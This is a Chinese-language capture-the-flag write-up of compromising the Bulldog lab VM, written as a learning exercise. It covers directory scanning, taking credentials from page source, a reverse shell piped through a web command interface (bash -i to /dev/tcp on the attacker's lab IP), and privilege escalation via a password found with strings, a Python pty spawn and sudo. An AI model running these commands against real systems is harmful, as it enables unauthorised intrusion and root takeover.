kali ip:192.168.23.131(xshell 7连接)
改为桥接模式
(图下是一个开启sshd的过程)
bulldog ip:192.168.23.88 (这里借用了老师搭建的靶机)
网站页面如下,空空如也,没有登录入口,没有能提交表单的入口,无法定位数据库的位置(?)
步骤如下:
kali使用dirb命令扫描靶机网址下的子域名:
得到目录:
访问admin登录,此时查看/dev/可以访问,但/dev/shell、需要登录后访问
f12查看源代码,发现如下信息
估计就是登录需要的用户名和密码了,解密nick后的哈希
登录,虽无root权限,但此时可以查看/dev/shell/了
回到kali开一个监听
(附上shell反弹命令)
[~]#棱角 ::Edge.Forum* (ywhack.com)
echo 是可以使用的,这里利用 echo 构建一个反弹shell的命令,然后用管道符交给 bash 执行
(其实这里如果用联合查询注入的话,其实&&是被过滤掉了的)
echo 'bash -i >& /dev/tcp/192.168.23.131/4444 0>&1' | bash
(中间是kali的ip)
run,kali接收到反弹shell
提权,倒数第四行发现bulldogadmin用户
cd .. 切换到home下
ls 显示目录下的内容
cd bulldogadmin 切换到子目录
ls -al 显示隐藏目录
cd .hiddenadmindirectory 转到此目录下
ls -al 查看隐藏目录
strings customPermissionApp 提取和显示非文本文件中的文本字符串
得到密码串SUPERultimatePASSWORDyouCANTget
(最后的part没搞出来,借用了(2条消息) 靶机渗透【bulldog】_bulldog靶场_pinkward的博客-CSDN博客
的几张图片
错误:)
Python 调用本地的 shell 实现,输入 python -c ‘import pty; pty.spawn("/bin/bash")’
sudo su - 进入登录模式,然后输入之前获得的密码串
提权成功